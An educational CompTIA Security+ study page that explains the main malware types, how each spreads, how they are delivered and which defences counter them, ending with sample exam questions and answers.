⚡ What is Malware?
Malware (malicious software) is any software designed to damage, disrupt, steal from, or gain unauthorised access to a system. The key distinctions the exam tests are how each type spreads (requires user action vs self-propagates), what it does (encrypts files, steals data, provides remote access, hides itself), and which defences apply. Knowing the difference between a virus and a worm, or a trojan and a RAT, is directly tested in Security+ scenario questions.

Core Malware Types

Virus
Requires Host File User Action to Spread
A virus attaches itself to a legitimate file or program and executes when that file is opened or the program is run. It cannot spread on its own — it requires a user to execute the infected file or share it with another system. Viruses can corrupt files, delete data, or deliver a payload.
How it spreads
Infected files shared via email, USB, downloads — requires user execution
Key characteristic
Needs a host file. Inert until the infected program is run.
Defence
Antivirus / EDR, user education, email scanning, disable autorun
Exam distinction
Virus = needs host + user action. Worm = self-propagates without user.
Worm
Self-Replicating No User Action Needed
A worm is self-replicating malware that spreads across networks without any user interaction. It exploits vulnerabilities in operating systems or network services to copy itself to other systems automatically. Worms can consume massive bandwidth and CPU resources through rapid replication, even if their payload is benign. WannaCry (2017) was a worm that spread via the EternalBlue SMB exploit (MS17-010).
How it spreads
Network vulnerabilities, open shares, exploits — no user action required
Key characteristic
Self-propagating. Can spread from a single infection to thousands of systems in minutes.
Defence
Patch management (closes exploited vulnerabilities), network segmentation, IDS/IPS
Exam distinction
Worm = no host needed, no user action, spreads itself. Virus = needs host file.
Trojan (Trojan Horse)
Disguised as Legitimate User Installs It
A trojan disguises itself as legitimate software to trick users into installing it. Unlike viruses, trojans do not self-replicate — they rely on the user to run them. Once executed, the trojan delivers its payload: creating a backdoor, downloading additional malware, stealing credentials, or providing remote access. Named after the Greek myth — appears harmless, contains the real threat inside.
How it spreads
Social engineering — fake software, cracked applications, malicious email attachments
Key characteristic
Masquerades as legitimate. Does not self-replicate. User must be tricked into running it.
Defence
User education, application allowlisting, download from trusted sources only, antivirus
Exam distinction
Trojan = disguised, user-installed, no replication. RAT = a trojan that provides remote access.
Ransomware
Demands Payment Encrypts Files
Ransomware encrypts the victim's files and demands payment (typically cryptocurrency) for the decryption key. Modern ransomware often uses a two-stage attack: exfiltrate data first (for double extortion — "pay or we publish your data"), then encrypt. Ransomware typically arrives via phishing email, RDP brute force, or exploited vulnerabilities. Offline, tested backups are the most effective defence — payment does not guarantee decryption.
How it spreads
Phishing email, compromised RDP (port 3389), drive-by downloads, worm propagation
Key characteristic
Encrypts files using asymmetric or hybrid encryption. Attacker holds the private key.
Defence
Offline backups (3-2-1 rule), patch management, disable RDP if unused, MFA, email filtering
Exam note
RAID is NOT a defence against ransomware — it replicates the encryption to all mirrors instantly.
Rootkit
Deep System Access Hides Itself
A rootkit provides an attacker with privileged (root/admin) access to a system while actively hiding its presence from the operating system, antivirus tools, and administrators. Kernel-level rootkits modify the OS kernel itself — making them extremely difficult to detect or remove. Bootkits are rootkits that infect the master boot record (MBR), loading before the OS. Detection requires booting from external trusted media and scanning offline.
How it spreads
Often delivered by trojans after initial compromise; requires privilege escalation to install
Key characteristic
Hides itself and other malware. Operates at kernel or firmware level. Survives reboots.
Defence / Removal
Boot from trusted external media, offline scanning, UEFI Secure Boot, full OS reinstall often required
Exam note
Standard antivirus running inside the infected OS cannot reliably detect rootkits — they intercept and hide themselves from the OS.
Spyware
Monitors User Exfiltrates Data
Spyware secretly monitors user activity and transmits data to an attacker — browsing history, credentials, personal information, screenshots. It typically runs silently in the background with no visible interface. Often bundled with free software (PUPs — Potentially Unwanted Programs). Stalkerware is a category of spyware used for intimate partner surveillance.
How it spreads
Bundled with free downloads, drive-by downloads, PUPs, malicious browser extensions
Key characteristic
Silent surveillance. No visible presence. Continuously sends data to attacker-controlled server.
Defence
Anti-spyware/antivirus, careful download practices, browser extension audits, network monitoring for unusual outbound traffic
Exam distinction
Spyware = broad surveillance. Keylogger = specifically records keystrokes.
Keylogger
Records Keystrokes Credential Theft
A keylogger records every keystroke typed on the keyboard — capturing passwords, credit card numbers, messages, and any other typed input. Software keyloggers run as background processes; hardware keyloggers are physical devices plugged between the keyboard and computer (used in targeted attacks on shared workstations). Logs are either stored locally (retrieved later) or transmitted in real time to the attacker.
Types
Software: runs as process, installed via trojan or spyware. Hardware: physical device between keyboard and USB port.
Key characteristic
Captures credentials at point of entry — bypasses encrypted connections because it captures before encryption.
Defence
MFA (keylogged password alone isn't enough), physical port inspection on shared machines, antivirus, virtual keyboard for sensitive entry
Exam note
MFA is the key defence — even if a password is stolen via keylogger, the second factor prevents access.
RAT — Remote Access Trojan
Full Remote Control Persistent Backdoor
A RAT gives an attacker full remote control of an infected system — file access, webcam/microphone access, keylogging, command execution, lateral movement staging. RATs are delivered like trojans (disguised software), then establish a persistent covert channel back to the attacker's command-and-control (C2) server. Often used as the first foothold in an advanced persistent threat (APT) campaign.
How it spreads
Phishing, malicious attachments, trojanised software, drive-by downloads
Key characteristic
Persistent backdoor with full interactive access. Uses C2 infrastructure. Difficult to detect due to encrypted outbound traffic.
Defence
Egress filtering (outbound traffic monitoring), EDR/behavioural analysis, application allowlisting, network anomaly detection
Exam distinction
RAT = trojan + persistent remote control. All RATs are trojans; not all trojans are RATs.
Fileless Malware
No Files on Disk Lives in Memory
Fileless malware operates entirely in memory (RAM) without writing files to disk, making it invisible to traditional file-based antivirus scanners. It typically abuses legitimate system tools — PowerShell, WMI (Windows Management Instrumentation), or the Windows registry — to execute malicious code. A fileless attack might arrive via a malicious document macro that launches PowerShell to download and execute code directly in memory, leaving no files behind.
How it spreads
Malicious macros, phishing links, exploit kits — initial vector writes nothing to disk
Key characteristic
Evades signature-based AV. Uses LOLBins (Living Off the Land Binaries) — legitimate Windows tools as weapons. Disappears on reboot (unless it adds persistence).
Defence
EDR with behavioural analysis, PowerShell constrained language mode, script block logging, disable macros, application control
Exam note
Traditional signature-based AV cannot detect fileless malware — behavioural/heuristic analysis or EDR is required.
Botnet / Bot
C2 Controlled Network of Infected Hosts
A botnet is a network of compromised computers (bots or zombies) controlled remotely by an attacker via a command-and-control (C2) server. Each infected machine receives instructions from the C2 — launch a DDoS attack, send spam, mine cryptocurrency, or spread additional malware. The bot owner (botmaster) can rent botnet access to other criminals. Individual bots are infected via worms, trojans, or drive-by downloads and often show no obvious symptoms.
Used for
DDoS attacks, spam campaigns, credential stuffing, click fraud, cryptocurrency mining
Key characteristic
C2 infrastructure. Infected machines follow attacker commands. Hard to detect — often low CPU/bandwidth use per bot.
Defence
Patch management, antivirus/EDR, network monitoring for C2 beacon traffic, DNS sinkholing
Exam note
DDoS attacks often use botnets — thousands of bots flood a target simultaneously. Mitigated by rate limiting, CDNs, and scrubbing centres.
Adware & PUP
Unwanted Ads Privacy Risk
Adware displays unwanted advertisements, often by injecting ads into browsers or redirecting searches. Potentially Unwanted Programs (PUPs) are software that users technically agreed to install (buried in licence agreements) but wouldn't want if they understood what was being installed — toolbars, browser hijackers, fake optimisers. Not always malicious but degrade performance and privacy.
How it spreads
Bundled with free software installs, fake "update" prompts, deceptive download buttons
Defence
Ad blockers, careful installation (decline additional software), antivirus/anti-adware tools, browser extension audit
⚡ The most tested malware distinctions

Virus vs Worm: Virus needs a host file and user action to spread. Worm self-propagates across networks with no user action. Worms are faster spreading and often cause more collateral damage through bandwidth consumption.

Trojan vs RAT: All RATs are trojans (disguised as something legitimate), but not all trojans are RATs. A RAT specifically provides persistent interactive remote control. A trojan might just install a keylogger or create a backdoor without interactive access.

Rootkit detection: You cannot reliably detect a rootkit from inside the infected OS — it intercepts OS calls and hides itself. Must boot from external trusted media to scan offline.

Ransomware vs backup: RAID is not a defence against ransomware (mirrors replicate the encryption). Offline, air-gapped backups that are tested regularly are the only reliable defence against data loss from ransomware.

Malware Delivery Methods

Delivery MethodHow It WorksMalware Types Delivered
Phishing EmailMalicious attachment (macro-enabled document, executable) or link to drive-by download siteRansomware, trojans, RATs, keyloggers, fileless malware
Drive-by DownloadVisiting a compromised or malicious website triggers an automatic download exploiting browser or plugin vulnerabilitySpyware, adware, trojans, ransomware
Malicious USB / MediaInfected USB drive left in a car park (baiting); autorun executes malware on plug-inWorms (autorun), trojans, RATs
Software Supply ChainLegitimate software is compromised before distribution — SolarWinds attack (2020) is the canonical exampleTrojans, RATs, backdoors
Exploit / VulnerabilityUnpatched vulnerability exploited directly — no user interaction required if the service is exposedWorms, rootkits, ransomware (via RDP)
Watering HoleAttacker compromises a website the target is known to visit — executes drive-by download when victim visitsRATs, trojans, spyware

Malware Defences

Layered defence — defence in depth

Antivirus / EDR: Signature-based AV catches known malware; EDR (Endpoint Detection and Response) adds behavioural analysis for unknown/fileless malware. EDR is the modern standard.

Patch management: Most worms and drive-by downloads exploit known, patched vulnerabilities. Keeping systems patched eliminates most of the attack surface.

User education: Phishing delivers most malware — training users to recognise phishing is the highest-ROI defence against trojans, ransomware, and RATs.

Least privilege: Limits the damage malware can do — malware running as a standard user cannot install kernel-level rootkits or modify system files.

Network segmentation: Limits lateral movement and worm propagation — a worm that infects one segment cannot reach systems on isolated segments.

Offline backups (3-2-1): Three copies, two different media, one off-site/offline. The only reliable defence against ransomware data loss.

Exam Scenarios

💬 "Malware spread across an entire office network within minutes of a single infection, without any users opening files or clicking links. What type of malware is this?" → Worm — self-propagating malware that spreads across networks exploiting vulnerabilities without user interaction.
💬 "A user downloads what appears to be a free game. After installation, the attacker has full remote access to the computer. What type of malware is this?" → RAT (Remote Access Trojan) — disguised as legitimate software, delivered via social engineering, provides persistent remote control.
💬 "An administrator cannot find any malware files on disk but the SIEM shows suspicious PowerShell activity and unusual outbound connections. What type of attack is suspected?" → Fileless malware — operates in memory using legitimate tools (PowerShell), leaves no files on disk, evades signature-based AV.
💬 "All files on a company's file server have been encrypted and a ransom note demands Bitcoin payment. The company had RAID 5 on the server. Is the data recoverable without paying?" → RAID does not protect against ransomware — the encryption replicated to all RAID members. Recovery depends on offline backups. RAID is not a backup.
💬 "Antivirus running on an infected computer reports no threats, but external scanning from a boot disk finds a rootkit. Why did the installed AV miss it?" → Rootkits operate at kernel level and intercept OS calls — they hide themselves from software running on the infected OS, including antivirus. Only offline scanning from trusted external media can reliably detect them.
💬 "A keylogger has captured a user's password. What security control would prevent the attacker from using the stolen password?" → MFA (Multi-Factor Authentication) — the stolen password alone is insufficient without the second factor (authenticator app, SMS, hardware token).
💬 "What is the key difference between a virus and a worm?" → A virus requires a host file and user action to spread. A worm is self-propagating — it spreads automatically across networks without user involvement, exploiting vulnerabilities directly.
💬 "A botnet is being used to flood a website with traffic. What type of attack is this, and what is each infected machine called?" → DDoS (Distributed Denial of Service) attack. Each infected machine is called a bot or zombie. The attacker controls them via a C2 (command-and-control) server.

Studying for Security+?

See the study guides and practice exams that cover the full SY0-701 exam.

See Security+ Resources →

Related Articles

Network Attacks Explained Social Engineering Attacks Incident Response — PICERL Security+ Cheat Sheet IAM Explained Cryptography Explained Firewall Basics Troubleshooting Methodology How to Pass Security+ Best Security+ Study Resources